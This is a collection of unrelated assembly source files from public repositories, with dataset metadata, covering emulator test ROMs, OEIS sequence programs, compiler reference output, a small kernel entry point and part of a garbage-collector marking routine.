addi x5, x0, 3
addi x6, x0, 3
addi x0, x0, 0
beq x5, x6, br1 #ID rs1 from MEM
addi x10, x0, 10 #should not run
br1ret: jalr x0, x0, main
br1: addi x11, x0, 0x30
addi x0, x0, 0
jalr x0, x11, main #jalr x0, x0, br1ret |
||||
TheStack | dd643c1cdc5de02d97736f18af2abddf5d88561d | Assemblycode:Assembly | {"size": 3825, "ext": "asm", "max_stars_repo_path": "apu/channel_4/channel_4_lfsr15.asm", "max_stars_repo_name": "endrift/SameSuite", "max_stars_repo_stars_event_min_datetime": "2018-09-09T01:49:32.000Z", "max_stars_repo_stars_event_max_datetime": "2022-03-22T20:49:05.000Z", "max_issues_repo_path": "apu/channel_4/channel_4_lfsr15.asm", "max_issues_repo_name": "mattcurrie/SameSuite", "max_issues_repo_issues_event_min_datetime": "2020-10-18T16:33:08.000Z", "max_issues_repo_issues_event_max_datetime": "2021-09-04T10:58:51.000Z", "max_forks_repo_path": "apu/channel_4/channel_4_lfsr15.asm", "max_forks_repo_name": "mattcurrie/SameSuite", "max_forks_repo_forks_event_min_datetime": "2018-09-29T19:18:03.000Z", "max_forks_repo_forks_event_max_datetime": "2021-05-15T14:23:08.000Z"} | {"max_stars_count": 21, "max_issues_count": 3, "max_forks_count": 9, "avg_line_length": 17.0758928571, "max_line_length": 56, "alphanum_fraction": 0.5437908497} | RESULTS_START EQU $c006
RESULTS_N_ROWS EQU 16
include "base.inc"
; This test verifies the LFSR algorithm used is correct,
; this time using 15-bit LFSR.
; For convinence, it proccesses the results into
; reconsructed LFSR values.
CorrectResults:
db $00, $00, $00, $80, $C0, $E0, $F0, $F8
db $FC, $FE, $FF, $FF, $FF, $FF, $FF, $FF
db $FF, $7F, $BF, $DF, $EF, $F7, $FB, $FD
db $FE, $FF, $FF, $FF, $FF, $FF, $FF, $7F
db $3F, $9F, $CF, $E7, $F3, $F9, $FC, $FE
db $FF, $FF, $FF, $FF, $FF, $7F, $BF, $5F
db $AF, $D7, $EB, $F5, $FA, $FD, $FE, $FF
db $FF, $FF, $FF, $7F, $3F, $1F, $0F, $87
db $C3, $E1, $F0, $F8, $FC, $FE, $FF, $FF
db $FF, $7F, $BF, $DF, $EF, $77, $BB, $DD
db $EE, $F7, $FB, $FD, $FE, $FF, $FF, $7F
db $3F, $9F, $CF, $67, $33, $99, $CC, $E6
db $F3, $F9, $FC, $FE, $FF, $7F, $BF, $5F
db $AF, $57, $AB, $55, $AA, $D5, $EA, $F5
db $FA, $FD, $FE, $7F, $3F, $1F, $0F, $07
db $03, $01, $00, $80, $C0, $E0, $F0, $F8
SubTest: MACRO
xor a
ldh [rNR52], a
cpl
ldh [rNR52], a
ld hl, rPCM34
ld a, $F0
ldh [rNR42], a
xor a
ldh [rNR43], a
ld a, $80
ldh [rNR44], a
nops \1
ld a, [hl]
call StoreResult
ENDM
RunTest:
ld de, $c000
xor a
ld [de], a
; Frequency is 512KHz, each sample is 2 cycles long
SubTest $00d
SubTest $00f
SubTest $011
SubTest $013
SubTest $015
SubTest $017
SubTest $019
SubTest $01b
SubTest $01d
SubTest $01f
SubTest $021
SubTest $023
SubTest $025
SubTest $027
SubTest $029
SubTest $02b
SubTest $02d
SubTest $02f
SubTest $031
SubTest $033
SubTest $035
SubTest $037
SubTest $039
SubTest $03b
SubTest $03d
SubTest $03f
SubTest $041
SubTest $043
SubTest $045
SubTest $047
SubTest $049
SubTest $04b
SubTest $04d
SubTest $04f
SubTest $051
SubTest $053
SubTest $055
SubTest $057
SubTest $059
SubTest $05b
SubTest $05d
SubTest $05f
SubTest $061
SubTest $063
SubTest $065
SubTest $067
SubTest $069
SubTest $06b
SubTest $06d
SubTest $06f
SubTest $071
SubTest $073
SubTest $075
SubTest $077
SubTest $079
SubTest $07b
SubTest $07d
SubTest $07f
SubTest $081
SubTest $083
SubTest $085
SubTest $087
SubTest $089
SubTest $08b
SubTest $08d
SubTest $08f
SubTest $091
SubTest $093
SubTest $095
SubTest $097
SubTest $099
SubTest $09b
SubTest $09d
SubTest $09f
SubTest $0a1
SubTest $0a3
SubTest $0a5
SubTest $0a7
SubTest $0a9
SubTest $0ab
SubTest $0ad
SubTest $0af
SubTest $0b1
SubTest $0b3
SubTest $0b5
SubTest $0b7
SubTest $0b9
SubTest $0bb
SubTest $0bd
SubTest $0bf
SubTest $0c1
SubTest $0c3
SubTest $0c5
SubTest $0c7
SubTest $0c9
SubTest $0cb
SubTest $0cd
SubTest $0cf
SubTest $0d1
SubTest $0d3
SubTest $0d5
SubTest $0d7
SubTest $0d9
SubTest $0db
SubTest $0dd
SubTest $0df
SubTest $0e1
SubTest $0e3
SubTest $0e5
SubTest $0e7
SubTest $0e9
SubTest $0eb
SubTest $0ed
SubTest $0ef
SubTest $0f1
SubTest $0f3
SubTest $0f5
SubTest $0f7
SubTest $0f9
SubTest $0fb
SubTest $0fd
SubTest $0ff
SubTest $101
SubTest $103
SubTest $105
SubTest $107
SubTest $109
SubTest $10b
SubTest $10d
SubTest $10f
SubTest $111
SubTest $113
SubTest $115
SubTest $117
SubTest $119
SubTest $11b
ret
StoreResult::
and $80
ld b, a
ld a, [de]
srl a
or b
inc de
ld [de], a
ret
CGB_MODE
|
||||
TheStack | f3370f98f5fe3c0c5661ab8dfcefe1203fc62c40 | Assemblycode:Assembly | {"size": 3389, "ext": "asm", "max_stars_repo_path": "circle/circle.asm", "max_stars_repo_name": "zsazsaz1/RiscSimulator", "max_stars_repo_stars_event_min_datetime": null, "max_stars_repo_stars_event_max_datetime": null, "max_issues_repo_path": "circle/circle.asm", "max_issues_repo_name": "zsazsaz1/RiscSimulator", "max_issues_repo_issues_event_min_datetime": null, "max_issues_repo_issues_event_max_datetime": null, "max_forks_repo_path": "circle/circle.asm", "max_forks_repo_name": "zsazsaz1/RiscSimulator", "max_forks_repo_forks_event_min_datetime": null, "max_forks_repo_forks_event_max_datetime": null} | {"max_stars_count": null, "max_issues_count": null, "max_forks_count": null, "avg_line_length": 38.9540229885, "max_line_length": 138, "alphanum_fraction": 0.4246090292} | add $sp, $zero, $imm, 1 # set $sp = 1
sll $sp, $sp, $imm, 11 # set $sp = 1 << 11 = 2048
lw $a0, $zero, $imm, 0x100 # get R from address 0x100 that we initialized
add $t0, $zero, $imm, 255 # set $t0 = 255
out $t0, $zero, $imm, 21 # write to monitordata 255 (white)
jal $imm, $zero, $zero, circle # start circle
halt $zero, $zero, $zero, 0 # halt
circle:
add $sp, $sp, $imm, -5 # adjust stack for 2 items
sw $ra, $sp, $imm, 4 # save $ra
sw $a0, $sp, $imm, 3 # save $a0
sw $s0, $sp, $imm, 2 # save $s0
sw $s1, $sp, $imm, 1 # save $s1
sw $s2, $sp, $imm, 0 # save $s2
add $s0, $a0, $zero, 0 # $s0 = R
add $s1, $imm, $s0, -1 # $s1 = i = R
add $s1, $s1, $imm, 1 # $s1 = R+1
add $t2, $zero, $zero, 0 # $t2 = y = 0
LOOP1:
add $s1, $s1, $imm, -1 # i-- (start from R)
blt $imm, $s1, $zero, done # for(i=R-1;i>0;i--)
add $s2, $imm, $zero, -1 # $s2 = j = -1
mul $t0, $s0, $s0, 0 # $t0 = R^2
mul $t1, $s1, $s1, 0 # $t1 = i^2
sub $t0, $t0, $t1, 0 # $t0 = R^2-i^2
LOOP:
mul $t1, $t2, $t2, 0 # $t1 = result = y^2
bgt $imm, $t1, $t0, sqrt # if (y^2 > R^2-i^2) return y-1
add $t2, $imm, $t2, 1 # y++
beq $imm, $zero, $zero, LOOP # continue the loop
sqrt:
add $t2, $t2, $imm, -1 # $t2 = y-1 = sqrt(R^2-i^2)
LOOP2:
add $s2, $s2, $imm, 1 # j++ (start from 0)
bge $imm, $s2, $t2, LOOP1 # for(j=0;j<y;j++) --- we only need to calculate each round 1/4 circle and the rest is symmetrical
add $t0, $s1, $imm, 175 # $t0 = i + 175
out $t0, $zero, $imm, 19 # write to monitorx i + 175
add $t0, $s2, $imm, 143 # $t0 = j + 143
out $t0, $zero, $imm, 20 # write to monitory j + 143
add $t0, $zero, $imm, 1 # set $t0 = 1
out $t0, $zero, $imm, 18 # write to monitorcmd
mul $t0, $s1, $imm, -1 # $t0 = -i
add $t0, $t0, $imm, 175 # $t0 = -i + 175
out $t0, $zero, $imm, 19 # write to monitorx -i + 175
add $t0, $zero, $imm, 1 # set $t0 = 1
out $t0, $zero, $imm, 18 # write to monitorcmd
mul $t0, $s2, $imm, -1 # $t0 = -j
add $t0, $t0, $imm, 143 # $t0 = -j + 143
out $t0, $zero, $imm, 20 # write to monitory -j + 143
add $t0, $zero, $imm, 1 # set $t0 = 1
out $t0, $zero, $imm, 18 # write to monitorcmd
add $t0, $s1, $imm, 175 # $t0 = i + 175
out $t0, $zero, $imm, 19 # write to monitorx i + 175
add $t0, $zero, $imm, 1 # set $t0 = 1
out $t0, $zero, $imm, 18 # write to monitorcmd
beq $imm, $zero, $zero, LOOP2 # continue the loop
done:
lw $s2, $sp, $imm, 0 # restore $s2
lw $s1, $sp, $imm, 1 # restore $s1
lw $s0, $sp, $imm, 2 # restore $s0
lw $a0, $sp, $imm, 3 # restore $a0
lw $ra, $sp, $imm, 4 # restore $ra
add $sp, $sp, $imm, 5 # pop 5 items from stack
beq $ra, $zero, $zero, 0 # return
.word 0x100 8 # radius for the circle
|
||||
TheStack | 540d14d85356508b4447288af5fd2b4661c4b290 | Assemblycode:Assembly | {"size": 678, "ext": "asm", "max_stars_repo_path": "oeis/066/A066210.asm", "max_stars_repo_name": "neoneye/loda-programs", "max_stars_repo_stars_event_min_datetime": "2021-08-22T19:44:55.000Z", "max_stars_repo_stars_event_max_datetime": "2022-03-20T16:47:57.000Z", "max_issues_repo_path": "oeis/066/A066210.asm", "max_issues_repo_name": "neoneye/loda-programs", "max_issues_repo_issues_event_min_datetime": "2021-08-29T13:15:54.000Z", "max_issues_repo_issues_event_max_datetime": "2022-03-09T19:52:31.000Z", "max_forks_repo_path": "oeis/066/A066210.asm", "max_forks_repo_name": "neoneye/loda-programs", "max_forks_repo_forks_event_min_datetime": "2021-08-22T20:56:47.000Z", "max_forks_repo_forks_event_max_datetime": "2021-09-29T06:26:12.000Z"} | {"max_stars_count": 11, "max_issues_count": 9, "max_forks_count": 3, "avg_line_length": 39.8823529412, "max_line_length": 495, "alphanum_fraction": 0.8200589971} | ; A066210: a(n) = ((2*n)^(2*n+2) - 1)/(4*n^2 - 1).
; 1,5,273,47989,17043521,10101010101,8978450801041,11168991475945493,18519084246547628289,39468223580173616639125,105120401002506265664160401,342134767379466388778420319285,1336055317331762879448123353666113,6165239757363019766071928620679315189,33187854560396738048859538889703513355281,206120154488525139043381535038932146829810901,1462930280182643781271332618476513990349633356801,11766817813511792302333023705207593957695533201266133,106469511324429819421464605849562537673557946638067676689
pow $0,2
mov $2,$0
lpb $0
mov $0,$2
add $3,1
div $0,$3
sub $0,$3
add $4,1
mul $4,4
mul $4,$2
lpe
mov $0,$4
add $0,1
|
||||
TheStack | ea7c05cd77c647c7effa2722fbd8147fde015c30 | Assemblycode:Assembly | {"size": 761, "ext": "asm", "max_stars_repo_path": "oeis/321/A321818.asm", "max_stars_repo_name": "neoneye/loda-programs", "max_stars_repo_stars_event_min_datetime": "2021-08-22T19:44:55.000Z", "max_stars_repo_stars_event_max_datetime": "2022-03-20T16:47:57.000Z", "max_issues_repo_path": "oeis/321/A321818.asm", "max_issues_repo_name": "neoneye/loda-programs", "max_issues_repo_issues_event_min_datetime": "2021-08-29T13:15:54.000Z", "max_issues_repo_issues_event_max_datetime": "2022-03-09T19:52:31.000Z", "max_forks_repo_path": "oeis/321/A321818.asm", "max_forks_repo_name": "neoneye/loda-programs", "max_forks_repo_forks_event_min_datetime": "2021-08-22T20:56:47.000Z", "max_forks_repo_forks_event_max_datetime": "2021-09-29T06:26:12.000Z"} | {"max_stars_count": 11, "max_issues_count": 9, "max_forks_count": 3, "avg_line_length": 33.0869565217, "max_line_length": 488, "alphanum_fraction": 0.7700394218} | ; A321818: a(n) = Sum_{d|n, n/d odd} d^8 for n > 0.
; Submitted by Christian Krause
; 1,256,6562,65536,390626,1679872,5764802,16777216,43053283,100000256,214358882,430047232,815730722,1475789312,2563287812,4294967296,6975757442,11021640448,16983563042,25600065536,37828630724,54875873792,78310985282,110092091392,152588281251,208827064832,282472589764,377802063872,500246412962,656201679872,852891037442,1099511627776,1406622983684,1785793905152,2251881546052,2821539954688,3512479453922,4347792138752,5352824997764,6553616777216,7984925229122,9684129465344,11688200277602
add $0,1
mov $2,$0
add $2,$0
lpb $0
mul $0,2
mov $3,$2
dif $3,$0
cmp $3,$2
cmp $3,0
mul $3,$0
sub $0,1
div $0,2
pow $3,8
add $1,$3
sub $2,1
lpe
mov $0,$1
div $0,256
|
||||
TheStack | 0b8de94a10fbfca1e8404f990ab503917d49ae83 | Assemblycode:Assembly | {"size": 1586, "ext": "asm", "max_stars_repo_path": "src/test/ref/struct-39.asm", "max_stars_repo_name": "jbrandwood/kickc", "max_stars_repo_stars_event_min_datetime": "2022-03-01T02:21:14.000Z", "max_stars_repo_stars_event_max_datetime": "2022-03-01T04:33:35.000Z", "max_issues_repo_path": "src/test/ref/struct-39.asm", "max_issues_repo_name": "jbrandwood/kickc", "max_issues_repo_issues_event_min_datetime": null, "max_issues_repo_issues_event_max_datetime": null, "max_forks_repo_path": "src/test/ref/struct-39.asm", "max_forks_repo_name": "jbrandwood/kickc", "max_forks_repo_forks_event_min_datetime": null, "max_forks_repo_forks_event_max_datetime": null} | {"max_stars_count": 2, "max_issues_count": null, "max_forks_count": null, "avg_line_length": 20.0759493671, "max_line_length": 127, "alphanum_fraction": 0.5939470366} | // Complex C-struct - copying a sub-struct with 2-byte members from C-standard layout to C-standard layout (expecting a memcpy)
// Commodore 64 PRG executable file
.file [name="struct-39.prg", type="prg", segments="Program"]
.segmentdef Program [segments="Basic, Code, Data"]
.segmentdef Basic [start=$0801]
.segmentdef Code [start=$80d]
.segmentdef Data [startAfter="Code"]
.segment Basic
:BasicUpstart(main)
.const MOVE_TO = 0
.const SPLINE_TO = 1
.const OFFSET_STRUCT_SEGMENT_TO = 1
.const SIZEOF_STRUCT_VECTOR = 4
.const OFFSET_STRUCT_VECTOR_Y = 2
.label SCREEN = $400
.segment Code
main: {
.label to = 4
.label j = 3
.label i = 2
lda #0
sta.z j
sta.z i
__b1:
// __ma struct Vector to = letter_c[i].to
lda.z i
asl
asl
asl
clc
adc.z i
tax
ldy #0
!:
lda letter_c+OFFSET_STRUCT_SEGMENT_TO,x
sta to,y
inx
iny
cpy #SIZEOF_STRUCT_VECTOR
bne !-
// SCREEN[j++] = to.x
lda.z j
asl
tay
lda.z to
sta SCREEN,y
lda.z to+1
sta SCREEN+1,y
// SCREEN[j++] = to.x;
ldx.z j
inx
// SCREEN[j++] = to.y
txa
asl
tay
lda.z to+OFFSET_STRUCT_VECTOR_Y
sta SCREEN,y
lda.z to+OFFSET_STRUCT_VECTOR_Y+1
sta SCREEN+1,y
// SCREEN[j++] = to.y;
inx
stx.z j
// for( byte i: 0..2)
inc.z i
lda #3
cmp.z i
bne __b1
// }
rts
}
.segment Data
// True type letter c
letter_c: .byte MOVE_TO
.word 'a', 'b', 0, 0
.byte SPLINE_TO
.word 'c', 'd', $67, $a9
.byte SPLINE_TO
.word 'e', 'f', $4b, $c3
|
||||
TheStack | 581f4a944223564474fe0d915307b72fc118efea | Assemblycode:Assembly | {"size": 672, "ext": "asm", "max_stars_repo_path": "oeis/109/A109367.asm", "max_stars_repo_name": "neoneye/loda-programs", "max_stars_repo_stars_event_min_datetime": "2021-08-22T19:44:55.000Z", "max_stars_repo_stars_event_max_datetime": "2022-03-20T16:47:57.000Z", "max_issues_repo_path": "oeis/109/A109367.asm", "max_issues_repo_name": "neoneye/loda-programs", "max_issues_repo_issues_event_min_datetime": "2021-08-29T13:15:54.000Z", "max_issues_repo_issues_event_max_datetime": "2022-03-09T19:52:31.000Z", "max_forks_repo_path": "oeis/109/A109367.asm", "max_forks_repo_name": "neoneye/loda-programs", "max_forks_repo_forks_event_min_datetime": "2021-08-22T20:56:47.000Z", "max_forks_repo_forks_event_max_datetime": "2021-09-29T06:26:12.000Z"} | {"max_stars_count": 11, "max_issues_count": 9, "max_forks_count": 3, "avg_line_length": 96.0, "max_line_length": 495, "alphanum_fraction": 0.7931547619} | ; A109367: Squares of the form 2*p + 3, where p is a prime.
; Submitted by Christian Krause
; 9,25,49,121,169,361,529,625,841,961,1369,1681,2209,3025,4225,4489,5329,5929,6241,8281,9409,10201,10609,11881,14161,20449,22801,24025,24649,25921,34969,38809,42025,43681,44521,48841,51529,54289,55225,57121,60025,64009,66049,69169,70225,75625,82369,83521,85849,89401,93025,94249,104329,109561,113569,121801,124609,128881,134689,137641,151321,157609,162409,167281,172225,182329,190969,196249,201601,207025,214369,223729,231361,237169,241081,243049,247009,259081,265225,271441,277729,286225,290521
seq $0,109358 ; Square root of squares of form 2*p + 3, where p is prime.
pow $0,2
|
||||
TheStack | bc4fc422d3c7baa4cfebfc06c301d07c927eb6a5 | Assemblycode:Assembly | {"size": 123, "ext": "asm", "max_stars_repo_path": "asm/kernel/kernel-jump.asm", "max_stars_repo_name": "damilolarandolph/pong-os", "max_stars_repo_stars_event_min_datetime": "2021-08-27T23:28:06.000Z", "max_stars_repo_stars_event_max_datetime": "2021-08-31T09:02:47.000Z", "max_issues_repo_path": "asm/kernel/kernel-jump.asm", "max_issues_repo_name": "damilolarandolph/pong-os", "max_issues_repo_issues_event_min_datetime": null, "max_issues_repo_issues_event_max_datetime": null, "max_forks_repo_path": "asm/kernel/kernel-jump.asm", "max_forks_repo_name": "damilolarandolph/pong-os", "max_forks_repo_forks_event_min_datetime": null, "max_forks_repo_forks_event_max_datetime": null} | {"max_stars_count": 2, "max_issues_count": null, "max_forks_count": null, "avg_line_length": 6.8333333333, "max_line_length": 15, "alphanum_fraction": 0.6991869919} | [bits 32]
[extern main]
section .header
vbe_info:
times 8 dw 0
section .text
global _start
_start:
call main
jmp $
|
||||
TheStack | 4c4ef0fb067e7875a676455ce17d1cbe461c3554 | Assemblycode:Assembly | {"size": 206, "ext": "asm", "max_stars_repo_path": "libsrc/_DEVELOPMENT/math/float/math32/c/sdcc/cm32_sdcc___fs2sint.asm", "max_stars_repo_name": "jpoikela/z88dk", "max_stars_repo_stars_event_min_datetime": "2017-01-14T23:33:45.000Z", "max_stars_repo_stars_event_max_datetime": "2022-03-30T11:28:42.000Z", "max_issues_repo_path": "libsrc/_DEVELOPMENT/math/float/math32/c/sdcc/cm32_sdcc___fs2sint.asm", "max_issues_repo_name": "jpoikela/z88dk", "max_issues_repo_issues_event_min_datetime": "2017-01-15T16:12:02.000Z", "max_issues_repo_issues_event_max_datetime": "2022-03-31T12:11:12.000Z", "max_forks_repo_path": "libsrc/_DEVELOPMENT/math/float/math32/c/sdcc/cm32_sdcc___fs2sint.asm", "max_forks_repo_name": "jpoikela/z88dk", "max_forks_repo_forks_event_min_datetime": "2017-01-17T10:43:03.000Z", "max_forks_repo_forks_event_max_datetime": "2022-03-23T17:25:02.000Z"} | {"max_stars_count": 640, "max_issues_count": 1600, "max_forks_count": 215, "avg_line_length": 15.8461538462, "max_line_length": 27, "alphanum_fraction": 0.8883495146} |
SECTION code_fp_math32
PUBLIC cm32_sdcc___fs2sint
PUBLIC cm32_sdcc___fs2schar
EXTERN m32_f2sint
EXTERN cm32_sdcc_fsread1
cm32_sdcc___fs2sint:
cm32_sdcc___fs2schar:
call cm32_sdcc_fsread1
jp m32_f2sint
|
||||
TheStack | a78b02cfb1d4be3c4ae5cf72f36a3d4a3dd157d1 | Assemblycode:Assembly | {"size": 1154, "ext": "asm", "max_stars_repo_path": "sys/boot/st/switch.asm", "max_stars_repo_name": "olifink/smsqe", "max_stars_repo_stars_event_min_datetime": null, "max_stars_repo_stars_event_max_datetime": null, "max_issues_repo_path": "sys/boot/st/switch.asm", "max_issues_repo_name": "olifink/smsqe", "max_issues_repo_issues_event_min_datetime": null, "max_issues_repo_issues_event_max_datetime": null, "max_forks_repo_path": "sys/boot/st/switch.asm", "max_forks_repo_name": "olifink/smsqe", "max_forks_repo_forks_event_min_datetime": null, "max_forks_repo_forks_event_max_datetime": null} | {"max_stars_count": null, "max_issues_count": null, "max_forks_count": null, "avg_line_length": 23.08, "max_line_length": 74, "alphanum_fraction": 0.4497400347} | ; ATARI: ROM switch
section base
include 'dev8_keys_k'
base
move.w $ffff8240,d6
not.w $ffff8240 ; change palette
move.l #200,d7
add.l $4ba,d7 ; wait 1 sec
switch_wait
not.w $ffff8240 ; change palette
moveq #8,d5
switch_loop
move.l #$00010002,-(sp) ; bconstat for con
trap #13
addq.l #4,sp
tst.w d0 ; any character?
dbne d5,switch_loop
bne.s switch_check
cmp.l $4ba,d7 ; timeout?
bgt.s switch_wait
bra.s switch_set
switch_check
move.l #$00020002,-(sp) ; get character
trap #13
addq.l #4,sp
cmp.b #k.esc,d0 ; esc?
beq.s switch_rts ; ... yes
switch_set
not.w d6
move.w d6,$ffff8240
moveq #0,d6
move.b d0,d6 ; put key here, it is fairly safe
bra.s switch_end+8
switch_rts
move.w d6,$ffff8240
rts
switch_end
end
|
||||
TheStack | 9f8be32e4f5d87ac7f1fa65a4a4f59e3b38d8767 | Assemblycode:Assembly | {"size": 608, "ext": "asm", "max_stars_repo_path": "src/kernel.asm", "max_stars_repo_name": "AlessandroSangiuliano/Uros-microkerkel", "max_stars_repo_stars_event_min_datetime": "2021-12-25T17:02:04.000Z", "max_stars_repo_stars_event_max_datetime": "2022-01-08T10:49:47.000Z", "max_issues_repo_path": "src/kernel.asm", "max_issues_repo_name": "AlessandroSangiuliano/Uros-microkerkel", "max_issues_repo_issues_event_min_datetime": null, "max_issues_repo_issues_event_max_datetime": null, "max_forks_repo_path": "src/kernel.asm", "max_forks_repo_name": "AlessandroSangiuliano/Uros-microkerkel", "max_forks_repo_forks_event_min_datetime": null, "max_forks_repo_forks_event_max_datetime": null} | {"max_stars_count": 3, "max_issues_count": null, "max_forks_count": null, "avg_line_length": 14.1395348837, "max_line_length": 30, "alphanum_fraction": 0.5970394737} | [BITS 32]
global _start
extern kernel_main
CODE_SEG equ 0x08
DATA_SEG equ 0x10
_start:
mov ax, DATA_SEG
mov es, ax
mov ds, ax
mov fs, ax
mov ss, ax
mov gs, ax
mov ebp, 0x00200000
mov esp, ebp
;enable a20 line
in al, 0x92
or al, 2
out 0x92, al
.init_pic:
jmp pic_init
end_pic_init:
call kernel_main
jmp $
pic_init:
mov al, 00010001b
out 0x20, al ; tell master
;out 0xA0, al ; tell slave
mov al, 0x20
out 0x21, al
mov al, 00000001b
out 0x21, al
;out 0xA1, al
jmp end_pic_init
times 512-($ - $$) db 0 |
||||
TheStack | b47ed33d8772d1f4bab162152ad62da5d48b25b3 | Assemblycode:Assembly | {"size": 266, "ext": "asm", "max_stars_repo_path": "libsrc/_DEVELOPMENT/alloc/obstack/c/sdcc_iy/obstack_copy0_callee.asm", "max_stars_repo_name": "meesokim/z88dk", "max_stars_repo_stars_event_min_datetime": null, "max_stars_repo_stars_event_max_datetime": null, "max_issues_repo_path": "libsrc/_DEVELOPMENT/alloc/obstack/c/sdcc_iy/obstack_copy0_callee.asm", "max_issues_repo_name": "meesokim/z88dk", "max_issues_repo_issues_event_min_datetime": null, "max_issues_repo_issues_event_max_datetime": null, "max_forks_repo_path": "libsrc/_DEVELOPMENT/alloc/obstack/c/sdcc_iy/obstack_copy0_callee.asm", "max_forks_repo_name": "meesokim/z88dk", "max_forks_repo_forks_event_min_datetime": null, "max_forks_repo_forks_event_max_datetime": null} | {"max_stars_count": null, "max_issues_count": null, "max_forks_count": null, "avg_line_length": 15.6470588235, "max_line_length": 76, "alphanum_fraction": 0.7556390977} |
; void *obstack_copy0_callee(struct obstack *ob, void *address, size_t size)
SECTION code_alloc_obstack
PUBLIC _obstack_copy0_callee
_obstack_copy0_callee:
pop af
pop hl
pop de
pop bc
push af
INCLUDE "alloc/obstack/z80/asm_obstack_copy0.asm"
|
||||
TheStack | 9e68886be9ad9ac291cd9fab59bd396c66bc3dd6 | Assemblycode:Assembly | {"size": 19262, "ext": "asm", "max_stars_repo_path": "add/clean-run-time-system/acompact_rmarkr.asm", "max_stars_repo_name": "ErinvanderVeen/C-to-Clean", "max_stars_repo_stars_event_min_datetime": null, "max_stars_repo_stars_event_max_datetime": null, "max_issues_repo_path": "add/clean-run-time-system/acompact_rmarkr.asm", "max_issues_repo_name": "ErinvanderVeen/C-to-Clean", "max_issues_repo_issues_event_min_datetime": null, "max_issues_repo_issues_event_max_datetime": null, "max_forks_repo_path": "add/clean-run-time-system/acompact_rmarkr.asm", "max_forks_repo_name": "ErinvanderVeen/C-to-Clean", "max_forks_repo_forks_event_min_datetime": null, "max_forks_repo_forks_event_max_datetime": null} | {"max_stars_count": null, "max_issues_count": null, "max_forks_count": null, "avg_line_length": 16.2548523207, "max_line_length": 45, "alphanum_fraction": 0.7347108296} |
rmark_using_reversal:
push rsi
push rsi
mov rsi,1
jmp rmarkr_node
rmark_using_reversal_:
sub rcx,8
push rbx
push rsi
cmp rcx,rbx
ja rmark_no_undo_reverse_1
mov qword ptr [rsi],rcx
mov qword ptr [rcx],rax
rmark_no_undo_reverse_1:
mov rsi,1
jmp rmarkr_arguments
rmark_array_using_reversal:
push rbx
push rsi
cmp rcx,rbx
ja rmark_no_undo_reverse_2
mov qword ptr [rsi],rcx
ifdef PIC
lea r9,__ARRAY__+2+0
mov qword ptr [rcx],r9
else
mov qword ptr [rcx],offset __ARRAY__+2
endif
rmark_no_undo_reverse_2:
mov rsi,1
jmp rmarkr_arguments
rmarkr_hnf_2:
or qword ptr [rcx],2
mov rbp,qword ptr 8[rcx]
mov qword ptr 8[rcx],rsi
lea rsi,8[rcx]
mov rcx,rbp
rmarkr_node:
mov rax,qword ptr neg_heap_p3+0
add rax,rcx
cmp rax,qword ptr heap_size_64_65+0
jnc rmarkr_next_node_after_static
mov rbx,rax
and rax,31*8
shr rbx,8
ifdef PIC
lea r9,bit_set_table2+0
mov eax,dword ptr [r9+rax]
else
mov eax,dword ptr (bit_set_table2)[rax]
endif
mov ebp,dword ptr [rdi+rbx*4]
test rbp,rax
jne rmarkr_next_node
or rbp,rax
mov dword ptr [rdi+rbx*4],ebp
rmarkr_arguments:
mov rax,qword ptr [rcx]
test al,2
je rmarkr_lazy_node
movzx rbp,word ptr (-2)[rax]
test rbp,rbp
je rmarkr_hnf_0
add rcx,8
cmp rbp,256
jae rmarkr_record
sub rbp,2
je rmarkr_hnf_2
jc rmarkr_hnf_1
rmarkr_hnf_3:
mov rdx,qword ptr 8[rcx]
mov rax,qword ptr neg_heap_p3+0
add rax,rdx
mov rbx,rax
and rax,31*8
shr rbx,8
ifdef PIC
lea r9,bit_set_table2+0
mov eax,dword ptr [r9+rax]
else
mov eax,dword ptr (bit_set_table2)[rax]
endif
test eax,[rdi+rbx*4]
jne rmarkr_shared_argument_part
or dword ptr [rdi+rbx*4],eax
rmarkr_no_shared_argument_part:
or qword ptr [rcx],2
mov qword ptr 8[rcx],rsi
add rcx,8
or qword ptr [rdx],1
lea rdx,[rdx+rbp*8]
mov rbp,qword ptr [rdx]
mov qword ptr [rdx],rcx
mov rsi,rdx
mov rcx,rbp
jmp rmarkr_node
rmarkr_shared_argument_part:
cmp rdx,rcx
ja rmarkr_hnf_1
mov rbx,qword ptr [rdx]
lea rax,(8+2+1)[rcx]
mov qword ptr [rdx],rax
mov qword ptr 8[rcx],rbx
jmp rmarkr_hnf_1
rmarkr_record:
sub rbp,258
je rmarkr_record_2
jb rmarkr_record_1
rmarkr_record_3:
movzx rbp,word ptr (-2+2)[rax]
sub rbp,1
jb rmarkr_record_3_bb
je rmarkr_record_3_ab
dec rbp
je rmarkr_record_3_aab
jmp rmarkr_hnf_3
rmarkr_record_3_bb:
mov rdx,qword ptr (16-8)[rcx]
sub rcx,8
mov rax,qword ptr neg_heap_p3+0
add rax,rdx
mov rbp,rax
and rax,31*8
shr rbp,8
ifdef PIC
lea r9,bit_set_table2+0
mov eax,dword ptr [r9+rax]
else
mov eax,dword ptr (bit_set_table2)[rax]
endif
or dword ptr [rdi+rbp*4],eax
cmp rdx,rcx
ja rmarkr_next_node
add eax,eax
jne rmarkr_bit_in_same_word1
inc rbp
mov rax,1
rmarkr_bit_in_same_word1:
test eax,dword ptr [rdi+rbp*4]
je rmarkr_not_yet_linked_bb
mov rax,qword ptr neg_heap_p3+0
add rax,rcx
add rax,2*8
mov rbp,rax
and rax,31*8
shr rbp,8
ifdef PIC
lea r9,bit_set_table2+0
mov eax,dword ptr [r9+rax]
else
mov eax,dword ptr (bit_set_table2)[rax]
endif
or dword ptr [rdi+rbp*4],eax
mov rbp,qword ptr [rdx]
lea rax,(16+2+1)[rcx]
mov qword ptr 16[rcx],rbp
mov qword ptr [rdx],rax
jmp rmarkr_next_node
rmarkr_not_yet_linked_bb:
or dword ptr [rdi+rbp*4],eax
mov rbp,qword ptr [rdx]
lea rax,(16+2+1)[rcx]
mov qword ptr 16[rcx],rbp
mov qword ptr [rdx],rax
jmp rmarkr_next_node
rmarkr_record_3_ab:
mov rdx,qword ptr 8[rcx]
mov rax,qword ptr neg_heap_p3+0
add rax,rdx
mov rbp,rax
and rax,31*8
shr rbp,8
ifdef PIC
lea r9,bit_set_table2+0
mov eax,dword ptr [r9+rax]
else
mov eax,dword ptr (bit_set_table2)[rax]
endif
or dword ptr [rdi+rbp*4],eax
cmp rdx,rcx
ja rmarkr_hnf_1
add eax,eax
jne rmarkr_bit_in_same_word2
inc rbp
mov rax,1
rmarkr_bit_in_same_word2:
test eax,dword ptr [rdi+rbp*4]
je rmarkr_not_yet_linked_ab
